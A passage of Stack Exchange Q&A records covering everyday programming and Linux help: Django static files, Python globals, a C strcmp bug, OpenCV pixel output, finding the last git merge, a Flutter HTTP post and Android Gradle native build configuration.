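\nIn other words, a function from the other library kept being called on pages that never register the object it expects, and every one of those calls failed. A minimal sketch of the kind of guard that stops it (the names here are made up for illustration, they are not from my actual code):\n<code>\/\/ only forward the call when the page actually provided the object the library needs\nif (this.targetObject) {\n legacyLibrary.refresh(this.targetObject);\n}\n<\/code>\n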
I fixed it by adding condition to stop calling the function when in the pages with no provided object.\n","meta":{"source":"stackoverflow","title":"\"Object doesn't support this action\" error when navigate to new component in IE","dup_signals":{}},"subset":"stackexchange"} +{"text":"Proper way to get images from Django static folder\n\nQuestion: In my setting.py I have next code:\n<code>STATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n]\n\nSTATICFILES_DIRS = [\n os.path.join(PROJECT_DIR, 'static'),\n]\n\nSTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '\/static\/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '\/media\/'\n<\/code>\nAnd in views.py I want to get some of the images inside static folder as follows:\n<code>for f in [\"static\/img\/logo\/contact-form\/logo_black.png\", \"static\/img\/logo\/contact-form\/logo_white.png\":\n fp = open(os.path.join(BASE_DIR, f), 'rb')\n msg_img = MIMEImage(fp.read())\n fp.close()\n msg_img.add_header('Content-ID', '<{}>'.format(f))\n msg.attach(msg_img)\n<\/code>\nBut I'm getting an error:\n<code>\"[Errno 2] No such file or directory: '\/Users\/Admin\/Projects\/web-dealers\/webDealers\/static\/img\/logo\/contact-form\/logo-black.png'\"\n<\/code>\nUPDATE\nThe urls.py is as follows:\n<code>urlpatterns = [\n url(r'^django-admin\/', admin.site.urls),\n\n url(r'^admin\/', include(wagtailadmin_urls)),\n url(r'^documents\/', include(wagtaildocs_urls)),\n\n url(r'^search\/$', search_views.search, name='search'),\n url(r'^api\/', include('API.urls')),\n url(r'^contact-us\/', contact_us, name=\"contact_us\"),\n\n # Languages\n url(r'^i18n\/', include('django.conf.urls.i18n'), name='set_language'),\n url(r'^jsi18n\/$', JavaScriptCatalog.as_view(), name='javascript-catalog'),\n\n # For anything not caught by a more specific rule above, hand over to\n # Wagtail's page serving mechanism. This should be the last pattern in\n # the list:\n url(r'', include(wagtail_urls)),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n<\/code>\nWhat am I doing wrong?\nComment: you need to define them in urls to access them, or use external service like NGINX or Apache to serve them\nComment: @ruddra Check the updated question. They are defined in urls.\nComment: What is \"the rest of the code\"? In particular, how are you opening those files?\nComment: @DanielRoseman I've updated my question\nComment: Why do you include the \"static\" prefix and join with BASE_DIR? Why not `\"\/img\/logo\/contact-form\/logo_black.png\"` then join with STATIC_ROOT? Also note, STATIC_DIR should not be the same as STATICFILES_DIRS.\nComment: Might it be a problem with referring to static files in views. Check out [this question](https:\/\/stackoverflow.com\/a\/17738606\/216846) for discussion how to use static files in views.\nAnswer: Static in django are always tricky and a hell. I do not know why:) Don't you have <code>DEBUG=False<\/code> and forgot to do <code>python manage.py collectstatic<\/code>? 
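\nAs a side note: when you need to open a static file inside a view (as in your loop), it is usually safer to let the staticfiles finders locate the file than to join <code>BASE_DIR<\/code> by hand - a short sketch, assuming the default finders from your settings:\n<code>from django.contrib.staticfiles import finders\n\npath = finders.find('img\/logo\/contact-form\/logo_black.png')  # absolute path, or None if not found\nif path:\n    with open(path, 'rb') as fp:\n        data = fp.read()\n<\/code>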
\nHowever, this works for me:\n<code>settings.py<\/code>:\n<code>INSTALLED_APPS = [\n ...some other applications....\n\n 'django.contrib.staticfiles',\n\n ...some other applications....\n\n]\n\nSTATIC_URL = '\/static\/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\/\")\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n<\/code>\nI do not have anything in <code>urls.py<\/code>. I can access static files normally like: e.g. <code>localhost:8000\/static\/image.png<\/code>.\nEDIT:\nIt seems that I did not read that properly and answered something different:) Your problem is not during the static files serving but when you access internally at the backend. It says: file not found. Are you sure that the path is correct? Or, that the <code>os.path.join(BASE_DIR', 'static')<\/code> really contains the file? You try to access the file using and absolut path so it must be easily verifiable is it is there or not at:\n<code>'\/Users\/Admin\/Projects\/web-dealers\/webDealers\/static\/img\/logo\/contact-form\/logo-black.png'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Proper way to get images from Django static folder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Problems with Desktop screen after login\n\nQuestion: I am running Ubuntu 14.04-64bit. I have a HP Pavilion dv7 laptop with a nVidia GEForce GT 650M video card. I am not using the nVidia drivers that are in \"synaptic\". This morning when I booted up, after I logged in, the desktop screen came up, but there was no \"task bar\" (I think that is what you call the bar at the top of the screen) & any program that was launched via the \"Startup Applications\" has no bar with the \"exit,minimize, whole scree\" buttons on it. I am able to kill any program using a terminal. The graphics is as it should be, no distortion. Now I rebooted, and this time, after the login screen, I just get a \"black\" screen. I was unable to get anything to respond, so I had to hit the power button in order to exit and try another reboot. Eventually, it all worked as it was suppose to, and I am now able to open any program and send this question to ya'll. I am not sure where to begin to figure out what has happened, and I have not tried another reboot to see if the problem is still there or gone. If I need to give you more info, please let me know what (an maybe how to get it) and I will respond ASAP. Thanks for your time looking at this, and I welcome any help you may be able to give.\nAnswer: Well, a little advice, a little help:\nUnresponsive system - here's a set of what you can try before resorting to the power button. One of the 'hidden' gems in here is holding the PrntScr and slowly typing \"reisub\"\nI have a dv7 also, and the heat generated by the machine is terrible. I've had to reflow the graphics chip down onto the motherboard twice, and when 14.04 came out, Ubunti could not recognize the graphics chip. I never did get the proprietary drivers to work with that machine.\nFor me on my Pavilion, the graphics solution is a launchapd PPA by Oibaf - these are open source drivers, a bit more advanced(?) than those packaged by canonical, and perhaps less stable, but they work in my HP.\nComment: I'll give it a try. Thanks, I'll let ya know what happens.\nComment: I'd be interested to know if the oibaf repository works as well for you as it does for me. 
I think the xorg-edgers repository is supposed to have greater performance, but is perhaps a little more risky.\nComment: Sorry that it has taken me so long to get back with you. The \"oibaf\" video drivers installed without a hitch. I don't really see any difference, but. It did not fix my problem. When I boot, it may take 3 or 4 boots to finally get to a screen that I can see my working desktop and etc. On the screens that just have the background image on, I am able to open 'guake\", and do 'sudo reboot\" which takes me back to a reboot, but after 3 or 4 times it finally gives me a working desktop. I am beginning to think I may just have to completely reload Ubuntu 14.04LTS-64.\nComment: Kind of sounds like it to me. Do you also have the non-free firmware loaded?\nComment: `sudo apt-get install linux-firmware-nonfree`\nComment: I went into 'synaptic' and looked up 'linux-firmware-nonfree', it says that I don't have that loaded. Is this software \"not good\" or should it be installed? Thanks for your comments and help, it has given me commands, things to do, to help me to try and solve my problem. I also noticed (by accident) that in the \"Software and Updates\" in synaptic, the 'update' page has 'pre-released updates (trusty-proposed) checked. Is that 'bad'?\nComment: The 'firmware' is a collection of code used by various device drivers, such as wireless interface cards. The 'nonfree' indicates that the source code for the drivers is not available - they are considered proprietary, although the compiled code is freely available. I think you may need them - hp has lots of funny little quirks that the nonfree drivers help with.\nComment: Thanks, I'll load them, reboot and see if it helps. Wish me luck. Thanks again. Will let you know results.\nComment: Well, the problem seems to have just gone away. I'm not really sure what did the trick. But, alls well.....so far. Thanks for your help\n","meta":{"source":"askubuntu","title":"Problems with Desktop screen after login","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I find out if the variable is declared in Python?\n\nQuestion: I want to use a module as a singleton referenced in other modules. It looks something like this (that's not actually a code I'm working on, but I simplified it to throw away all unrelated stuff):\nmain.py\n<code>import singleton\nimport printer\n\ndef main():\n singleton.Init(1,2)\n printer.Print()\n\nif __name__ == '__main__':\n pass\n<\/code>\nsingleton.py\n<code>variable1 = ''\nvariable2 = ''\n\ndef Init(var1, var2)\n variable1 = var1\n variable2 = var2\n<\/code>\nprinter.py\n<code>import singleton\n\ndef Print()\n print singleton.variable1\n print singleton.variable2\n<\/code>\nI expect to get output 1\/2, but instead get empty space. I understand that after I imported singleton to the print.py module the variables got initialized again.\nSo I think that I must check if they were intialized before in singleton.py:\n<code>if not (variable1):\n variable1 = ''\nif not (variable2)\n variable2 = ''\n<\/code>\nBut I don't know how to do that. Or there is a better way to use singleton modules in python that I'm not aware of :)\nAnswer: The assignment inside <code>Init<\/code> is forcing the variables to be treated as locals. 
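\nThat is a general Python rule: any name that is assigned inside a function body becomes local to that function unless you declare otherwise, so the module-level variables never change. A tiny illustration of the same effect:\n<code>variable1 = ''\n\ndef Init(var1):\n    variable1 = var1   # binds a new local variable1; the module-level one is untouched\n\nInit(1)\nprint variable1        # still prints an empty string\n<\/code>\n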
Use the <code>global<\/code> keyword to fix this:\n<code>variable1 = ''\nvariable2 = ''\n\ndef Init(var1, var2):\n global variable1, variable2\n variable1 = var1\n variable2 = var2\n<\/code>\nAnswer: You can use the dictionaries vars and globals:\n<code>vars().has_key('variable1')\n<\/code>\nor\n<code>globals().has_key('variable1')\n<\/code>\nEdit:\nAlso...\n<code>'variable1' in vars()\n<\/code>\ne.g.\n<code>if not 'variable1' in vars():\n variable1 = ''\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do I find out if the variable is declared in Python?","dup_signals":{}},"subset":"stackexchange"} +{"text":"ComboBoxEdit SelectedIndex always -1\n\nQuestion: When I set comboBoxEdit.SelectedIndex = some value, it never takes this value; its value is always -1. I have set it in the constructor and in Form_Load.\n<code>if (oPersclientEntrp.TypPrint == 1) {\n comboBoxEdit_Print.SelectedIndex = 0;\n} else {\n comboBoxEdit_Print.SelectedIndex = 2;\n}\n<\/code>\nI have heard that the SelectedValue, SelectedIndex, SelectedItem properties can't be set until the control is added to the form. After the control is added to the form, the SelectedValue, -Index and -Item properties can be set.\nBut I bind the value in design mode.\nComment: are you using DevExpress Controls??\nAnswer: Try updating your code to be this:\n<code>if (oPersclientEntrp.TypPrint == 1) { comboBoxEdit_Print.SelectedIndex = 0; }\nelse { comboBoxEdit_Print.SelectedIndex = 1; }\n<\/code>\nIf you only have 2 items, your SelectedIndex should be 1, not 2.\nAnswer: You have 2 items, and the index used by <code>SelectedIndex<\/code> starts at <code>0<\/code> (because it accesses an internal array, which of course starts at 0). So you have to edit your code to use index <code>0<\/code> instead of 1 and index <code>1<\/code> instead of <code>2<\/code>.\nBtw, this is the common behavior of most <code>SelectedIndex<\/code> properties, e.g. of <code>TabControl<\/code>.\n","meta":{"source":"stackoverflow","title":"ComboBoxEdit SelectedIndex always -1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Contents of UITextField and UITextView to NSString\n\nQuestion: I have a UITextView and 2 UITextFields set up. The UITextView resigns first responder status when an empty part of the screen is tapped, and the same goes for the 2 UITextFields; for those 2, the return key also resigns first responder status. All 3 are declared in the interface.\nI would like to get the contents of all of these into individual NSStrings and\/or learn how to enter them directly into something like:\n<code>NSString *urlstr = [[NSString alloc] initWithFormat:@\"http:\/\/server.com\/file.php?var1=%@&var2=%@&var3=%@\", *content of UITextView*, *content of UITextField*, *content of UITextField*];\n<\/code>\nThis is a very basic question, I know, but I'm pretty much a novice. If I learn how to do this I'll probably be able to pick up from there.\ncheers\n(edited)\nAnswer: UITextField and UITextView both have a <code>text<\/code> property that you can use to retrieve the string values. 
For example,\n<code>NSString *string = [NSString stringWithFormat:@\"%@, %@\", textField.text, textView.text];<\/code>\nKeep in mind you'll probably want to examine the strings to make sure they're not empty or contain invalid characters before putting them into a URL.\nAnswer: The accepted answer is good, I just wanted to add the following for an expanded look at grabbing text in iOS.\nSee the <code>textInRange:<\/code> aspect of the below code that I devised to use one function to determine the text whether it's a UITextField, UITextView or any other class that complies with the UITextInput protocol.\n<code>\/\/handle text container object length whether it's a UITextField, UITextView et al\nNSUInteger LengthOfStringInTextInput(NSObject<UITextInput> *textContainer)\n{\n UITextPosition *beginningOfDocument = [textContainer beginningOfDocument];\n UITextPosition *endOfDocument = [textContainer endOfDocument];\n UITextRange *fullTextRange = [textContainer textRangeFromPosition:beginningOfDocument \n toPosition:endOfDocument];\n return [textContainer textInRange:fullTextRange].length;\n}\n<\/code>\nBy changing the return type to NSString and removing .length you could have the functionality of the text property on any class.\n","meta":{"source":"stackoverflow","title":"Contents of UITextField and UITextView to NSString","dup_signals":{}},"subset":"stackexchange"} +{"text":"How should I fix this error in strcmp function?\n\nQuestion: I wrote a code to sort employee details in ascending order of employee names. I'm seeing an error in the strcmp function where it says \"<code>strcmp makes pointer from integer without a cast<\/code>\". I'm having trouble solving this, can someone please help me out? The type of sorting algorithm I used was insertion sort.\nEmployee details:\nname, ID, age, salary respectively\n<code>Tom 001 25 3000\nSam 002 28 5000\nKat 003 34 3000\nAlice 004 45 7000\nJohn 005 48 9000\nRick 006 29 5000\nGeorge 007 32 3200\nAnnie 008 44 5500\nLucas 009 56 4700\nMandy 010 37 7500\n<\/code>\n<code>void InsertionSort(employee array[], int size)\n{\n int j;\n for(int pass = 1; pass < size; pass++)\n {\n char temp_name[20];\n strcpy(temp_name, array[pass].name);\n int temp_age;\n int temp_ID;\n double temp_salary;\n \/\/traverse through sorted sublist\n for (j = pass - 1; strcmp(temp_name, array[j].name < 0) && j>=0; j--)\n {\n strcpy(array[j+1].name , array[j].name); \/\/right shifting\n array[j+1].age = array[j].age;\n array[j+1].ID = array[j].ID;\n array[j+1].salary = array[j].salary;\n }\n \/\/found the location to insert\n \/\/copy the temp value to correct location\n strcpy(array[j+1].name , temp_name);\n array[j+1].age = temp_age;\n array[j+1].ID = temp_ID;\n array[j+1].salary = temp_salary;\n }\n}\n<\/code>\nComment: This is a great example of why I don't like complex expressions inside the `for()` loop definition. What does `strcmp(temp_name , array[j].name <0)` mean? [Hint: `array[j].name <0` is always going to be `false` (unless array[j].name is null), so you're passing `false \/ 0` to `strcmp()`.]\nComment: @Kingsley I'm trying to see if the string value in temp_name is smaller than the string value in array[j].name. All the employee details have been stored in a struct array.\nComment: The loop will try to access `array[ -1 ].name`... That is one place to fix...\nAnswer: The first understanding of the strcmp() is required. Can check any example code or documentation on the internet. 
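\n(Jumping ahead to the fix: the comparison has to move outside the call, and the j >= 0 test should be evaluated first so that array[j] is never read with a negative index. A sketch of the corrected loop header - this is my reading of the intent, not tested against the full program:\n<code>for (j = pass - 1; j >= 0 && strcmp(temp_name, array[j].name) < 0; j--)\n<\/code>\nThe temp_age, temp_ID and temp_salary locals also need to be copied from array[pass] before the shifting loop, otherwise the re-inserted record gets uninitialized values.)\n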
You can also check this link.\nAs parameters, the strcmp() function takes two strings, i.e. two pointers to char. In your code, strcmp(temp_name, array[j].name < 0), the second argument is the comparison array[j].name < 0, which does not make sense here.\nThat is why the warning is \"strcmp makes pointer from integer without a cast\": the function expects a pointer, but here it receives the integer result of a comparison.\nI assume you wanted to write strcmp(temp_name, array[j].name) < 0.\n","meta":{"source":"stackoverflow","title":"How should I fix this error in strcmp function?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Structured Data Testing - The value provided for image.url must be a valid URL\n\nQuestion: Google's structured data tester gives the following error for the <code>ImageObject<\/code> property. \n <code>The value provided for image.url must be a valid URL.<\/code>\n However, the image URL exists and has no problem. Any ideas? \nComment: Is the URL accessible publicly on the internet, or is it an internal\/private\/localhost address?\nComment: @MarkH. yes Mark, it is available publicly\nComment: Have you tried adding or removing the http prefix in your URL? Some apps expect http, some do not\nAnswer: I am getting this error as well. I notice that the Google structured data tester seems to have problems with image names containing .svg_ or .svg before the extension, e.g. 240px-Text-html_Gion.svg_.png or cloud.svg.jpg. When I truncate the image name to 240px-Text-html_Gion.png and use that image instead, it then works without error.\n","meta":{"source":"stackoverflow","title":"Google Structured Data Testing - The value provided for image.url must be a valid URL","dup_signals":{}},"subset":"stackexchange"} +{"text":"OpenCV Mat method \"at\" returning strange character in Linux\n\nQuestion: I am looking for a way to access the value of a grayscale pixel in a cv::Mat object. I was able to find a lot of answers and I'm sure they worked, but for me they just don't. So basically what I have is the following:\n<code> gray_image = imread(\"myimage.png\", CV_LOAD_IMAGE_GRAYSCALE);\n\n equalizeHist(gray_image, eq_image);\n\n \/\/ This line prints garbage\n const unsigned char* row = eq_image.ptr<unsigned char>(10);\n cout << row[10] << endl;\n\n \/\/ This line also prints garbage\n cout << eq_image.at<uchar>(10, 10) << endl;\n<\/code>\nI just want to see the grayscale [0,255] value of the pixel at position (10,10). I'm pretty sure those 2 lines worked for some other people, but not for me; maybe it's a Linux thing.\nHow can I read the cv::Mat pixel as a grayscale integer?\nThank you,\nAnswer: The value is printed as an ASCII character, which - depending on the actual value - may be non-printable garbage. If you want to print the pixel value as an integer instead, you need to cast the value to an <code>int<\/code> to get the other operator<< overload:\n<code>cout << static_cast<int>(row[10]) << endl;\n<\/code>\n","meta":{"source":"stackoverflow","title":"OpenCV Mat method \"at\" returning strange character in Linux","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find last merge in git?\n\nQuestion: For a web site, I have master and staging, and I have worked on staging for about 10 days. How do I tell for sure what has changed since my last merge, or when that merge was? Most of the merges I have done end up being FFs so I can't log them like <code>git merge branch -m 'merging staging'<\/code> (git reports it ignored -m). 
I usually merge master into staging for testing before merging staging into master for more testing and deployment.\nI could tag each one but I'm worried about the clutter of doing that for merges. What I'd like to know is \"roughly, what changed since my last merge of staging into master?\" Then I could make sure I spent extra time investigating those changes in the final examination. Sometimes co-workers make changes I hadn't noticed until this stage.\nI suppose since staging->into->master merges are rare, I could tag them and then do a \"git whatchanged tag\" but I'm hoping there is a non-tag way to do it. Thanks.\nComment: That's why I always avoid fast-forward merges...\nComment: In general it's always best to merge the smallest thing that's what you want. This prevents you from ever ending up in a situation where, say, you merge master into a feature branch, and pull in all kinds of other stuff you don't actually need. It sounds like your situation is at relatively low risk of this... except your question is about being aware of all the changes that everyone has merged in, and [merging upstream](http:\/\/gitster.livejournal.com\/42247.html) is a good way to really know what you should have.\nComment: @CharlesB: How do I avoid them? If I'm on staging, do I avoid merging master into it, and only merge staging into master?\nComment: @CharlesB: ah, I see, --no-ff? I'll have to try that...\nComment: @Hans: In general, you don't want to merge master into other branches, but rather the other way around.\nComment: @Jefromi: I do this because we have been hotfixing things in a branch which we merge into master and publish. After doing a few of these, we merge master into any development\/staging branches. Would it be better to merge the hotfixes directly? And, what is better about it? Thanks.\nAnswer: <code>git log --merges -n 1\n<\/code>\nworks well. From <code>man git-log<\/code>:\n<code> --merges\n Print only merge commits. This is exactly the same as --min-parents=2.\n<\/code>\nHere's an example using <code>--pretty=format:\"%H\"<\/code> to get just the SHA.\n<code>$ git log --pretty=format:\"%H\" --merges -n 1\nf32e1f13eef7d5843e8063b8709d01af6dcd5dbf\n<\/code>\nCredit goes to Jefromi for their comment on another answer.\nComment: $ git show :\/^Merge --pretty=format:\"%H\" returns: 1a2ccd458d1f19167b9eb2ea11a70cccac6ba4d4\nAnswer: Try this, it will select the last branch where the commit message starts with \"Merge\":\n<code>git show :\/^Merge\n<\/code>\nHere's a website with a few git tips that might help you out.\nComment: I think what you really want to do is `git log --merges -n 1`. There's actually no guarantee that a merge commit has a commit message of this form, even though it's the default.\nComment: @alex, thanks for the answer. For some reason, if I'm on a non-master branch and I \"merge master\" into it, it logs a commit message, but if I'm on master and merge that branch (eg, staging), it doesn't, because it's a fast-forward.\nComment: That's awesome. I don't know how I missed that, looking around for hours, but that's what I wanted. Incidentally, I can't tell, does it show the ff merges? I want to know when I merged, so using --no-ff in master is probably still good, right?\nComment: Also: how can I show the branchname so it shows in gitk or terminal version of gitk (k = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr, %cd) %C(bold blue)<%an>%Creset')? 
Does git store the branch name as it was when committed, or would I have to add that in the log msg?\nComment: @Hans: A fast-forward merge is not a merge commit, so no, `git log --merges` won't show it. The only record of a fast-forward merge is in the reflog; it's not a real tracked part of the repository in any way. If those fast-forwards are things you actually want to record permanently, then yes, you need to use `--no-ff` to force them to be recorded as merge commits.\nComment: @Hans: I'm not sure what you mean by \"show the branchname\". You mean the branch you merged into another? That's not really how git thinks: it merges *commits*. A branch is just a way to specify a commit. The default merge commit message (which is also generated when you use `--no-ff`) does include the merged branch name in its subject.\nAnswer: An alternative which does not rely on the content of the commit message:\n<code>$ git rev-list --min-parents=2 --max-count=1 HEAD\n9c6e6d6b6b9bd293335700e34e05217ae8e7a7e8\n<\/code>\n<code>--min-parents=2<\/code> selects only commits which are merges, <code>--max-count=1<\/code> only shows the first commit when going back in history. If the specified commit (<code>HEAD<\/code>) does not have any merge commits in its history, the output will be empty.\nAnswer: Looks like this is my best bet:\nI edited ~\/.gitconfig, adding:\n<code>[branch \"master\"]\n mergeoptions = --no-ff\n<\/code>\nThen if I'm on master and I merge in a branch, it shows it as a full merge. Having that as a config option for just \"master\" shows how awesome git is, so I can still FF merges within branches, where I'm likely to have a lot of short-lived topic branches, and I don't have to remember to specify --no-ff when merging on master. Beautiful.\nI use this alias for viewing logs:\nk = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr, %cd) %C(bold blue)<%an>%Creset' --abbrev-commit\n<code>> git k (similar to the gui gitk, but stays in the terminal)\n<\/code>\nWhen I view logs that way, it paints a nice picture of the branching. If I want to find the last one, I can do \n<code>> git show :\/\"Merge branch 'staging'\"\n<\/code>\nThanks for the help.\nEDIT: As @jefromi noted in the comments to the first answer, this is probably a better technique <code>git log --merges -n 1<\/code>\nAnswer: It looks like you don't really want to know what is changed since last merge, but what have I on branch staging that is not yet on branch master? (or the other way around). If so, look at the command <code>git cherry<\/code>.\nThough I must confess I never used this command because of the output format, which is not really helpful. Maybe there is a way to feed this output to git log\/git show or such.\n\nEdit: As I understand, you don't need a tag to use <code>git whatchanged<\/code>. Try simply <code>git whatchanged master..staging<\/code> to see what changed on staging since you last merged from staging to master.\nComment: \u016dlo - that's another good one. For this question, not allowing FF merges in master and using good log output format helps me mostly -- as does the `git show:\/\"Merge\"` trick, but I've also been using `git log master..staging` which seems similar to `git whatchanged master..staging`\nAnswer: Why not simply diff your staging branch against master? That will show you the actual differences in each of your files, and not only those unmerged stuff. 
It will also show things you may have dropped when merging from staging to master in the past.\nTry <code>git diff master..staging<\/code>,\nor <code>git diff master...staging<\/code> to see the diff from their common ancestor to 'staging'.\nAnswer: Take the latest merge and extract the name of the branch that was merged into the current branch:\nMC=<code>git log --merges -n 1 | grep request<\/code>; BB=${MC##*:}; B=${BB%% }; SUBBRANCH=${B##\/}\necho $MC\n","meta":{"source":"stackoverflow","title":"How to find last merge in git?","dup_signals":{}},"subset":"stackexchange"} +{"text":"flutter http send empty body\n\nQuestion: This is what I tried:\n<code>Future<User> guestLogin(String deviceID) async {\n var body = {\n \"deviceid\": deviceID,\n };\n\n var bodyEncoded = json.encode(body);\n\n Response response = await client.post(\n \"$_baseURL\/api\/user\/guest\",\n body: bodyEncoded,\n headers: {\"Content-Type\": \"application\/json\"},\n );\n return User.fromJson(json.decode(response.body));\n} \n<\/code>\nbut when I check it on the server side, which is written in Go, I see that the body is empty. When I try it in Postman it works well. Where is the problem?\nComment: What's the response status?\nComment: @ClaudioRedi it's 200\nComment: What do you expect as body?\nComment: a user model. @ClaudioRedi . But Flutter sends the post body as empty\nComment: Hard to tell from the code you show. 
Do you own the api to check why the response is empty?\nComment: @ClaudioRedi the response is empty because flutter is sending post body as empty as i send it from flutter code. so there is no problem on serverside cause when i call it from postman its working well. And i logged into golang then i see that body is empty.\nComment: Posted `body` can't be null according the code you show. Maybe `deviceid` is null or empty?\nComment: @ClaudioRedi no i have debugged it and its not empty.\nComment: Have you tried specifying the encoding inside the post? Like: `encoding: utf8`\nAnswer: try <code>jsonEncode(body)<\/code> instead of <code>json.encode(body)<\/code>\nComment: `jsonEncode(body)` and `json.encode(body)` are exactly the same @Ali G\u00fcrelli.... look at the definition https:\/\/api.dart.dev\/stable\/2.9.0\/dart-convert\/jsonEncode.html\n","meta":{"source":"stackoverflow","title":"flutter http send empty body","dup_signals":{}},"subset":"stackexchange"} +{"text":"build gradle fail with \"no signature of method .... is applicable for argument types: (java.lang.String) values\"\n\nQuestion: I have 4 gradle build files: when I build in android studio I am constantly having the error: \n\nNo signature of method:\n org.gradle.model.ModelMap.getDefaultProguardFile() is applicable for\n argument types: (java.lang.String) values: [proguard-android.txt]\n\nfile 1\n<code>\/\/ Top-level build file where you can add configuration options common to all sub-projects\/modules.\n\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.android.tools.build:gradle-experimental:0.9.3'\n \/\/ NOTE: Do not place your application dependencies here; they belong\n \/\/ in the individual module build.gradle files\n }\n}\n\nallprojects {\n repositories {\n jcenter()\n }\n}\n\ntask clean(type: Delete) {\n delete rootProject.buildDir\n}\n<\/code>\nfile 2\n<code>apply plugin: 'com.android.model.native'\n\nmodel {\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 1\n versionName = '1.0'\n }\n ndk {\n moduleName = 'fpextractor'\n platformVersion = 17\n toolchain = \"clang\"\n stl = 'gnustl_static' \/\/std::mutex not in gnustl_static\n cppFlags.add('-std=c++11')\n abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86'])\n \/\/abiFilters.addAll(['armeabi', 'armeabi-v7a', 'arm64-v8a', 'x86', 'x86_64', 'mips', 'mips64']) \/\/this is default\n \/\/abiFilters.addAll(['armeabi'])\n ldLibs.addAll(['android', 'log', 'atomic', 'z'])\n }\n }\n}\n\n\/\/ This is just copy out the header file and built lib into distribution\n\/\/ directory for clint application to use; it is a small overhead of this sample:\n\/\/ both lib and app are put inside one project space [save maintenance time]\ntask(distributeLib, type : Copy) {\n \/\/ trigger build library\n dependsOn assemble\n into '..\/distribution\/fpextractor\/'\n from('src\/main\/jni\/fp_extractor.h') {\n into 'include\/'\n }\n from('build\/outputs\/native\/release\/lib') {\n into 'lib\/'\n }\n}\n<\/code>\nfile 3\n<code>apply plugin: 'com.android.model.native'\n\nmodel {\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 1\n versionName = '1.0'\n }\n ndk {\n moduleName = 'nativeaudio'\n platformVersion = 17\n toolchain = \"clang\"\n stl = 'gnustl_static' \/\/std::mutex not in gnustl_static\n cppFlags.add('-std=c++11')\n 
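\/\/ build only these ABIs for this module (the app module's abiFilters list uses the same set)\n 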
abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86'])\n \/\/abiFilters.addAll(['armeabi', 'armeabi-v7a', 'arm64-v8a', 'x86', 'x86_64', 'mips', 'mips64']) \/\/this is default\n \/\/abiFilters.addAll(['armeabi-v7a'])\n ldLibs.addAll(['android', 'log', 'OpenSLES', 'atomic'])\n }\n }\n}\n\n\/\/ This is just copy out the header file and built lib into distribution\n\/\/ directory for clint application to use; it is a small overhead of this sample:\n\/\/ both lib and app are put inside one project space [save maintenance time]\ntask(distributeLib, type : Copy) {\n \/\/ trigger build library\n dependsOn assemble\n into '..\/distribution\/nativeaudio\/'\n from('src\/main\/jni\/buf_manager.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/android_debug.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/debug_utils.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/audio_common.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/audio_recorder.h') {\n into 'include\/'\n }\n from('build\/outputs\/native\/release\/lib') {\n into 'lib\/'\n }\n}\n<\/code>\nfile 4\n<code>apply plugin: 'com.android.model.application'\n\n\/\/ Root of 3rd party lib(s): location could be anywhere on the host system\ndef lib_distribution_root = '..\/distribution'\nmodel {\n repositories {\n libs(PrebuiltLibraries) {\n \/\/ Configure one pre-built lib: shared\n nativeaudio {\n \/\/ Inform Android Studio where header file dir for this lib\n headers.srcDir \"${lib_distribution_root}\/nativeaudio\/include\"\n \/\/ Inform Android Studio where lib is -- each ABI should have a lib file\n binaries.withType(SharedLibraryBinary) {\n sharedLibraryFile = file(\"${lib_distribution_root}\/nativeaudio\/lib\/${targetPlatform.getName()}\/libnativeaudio.so\")\n }\n }\n fpextractor {\n \/\/ Inform Android Studio where header file dir for this lib\n headers.srcDir \"${lib_distribution_root}\/fpextractor\/include\"\n \/\/ Inform Android Studio where lib is -- each ABI should have a lib file\n binaries.withType(SharedLibraryBinary) {\n sharedLibraryFile = file(\"${lib_distribution_root}\/fpextractor\/lib\/${targetPlatform.getName()}\/libfpextractor.so\")\n }\n }\n \/\/ Configure another pre-built lib: shared;[change to static after Studio supports]\n \/\/ static lib generation. 
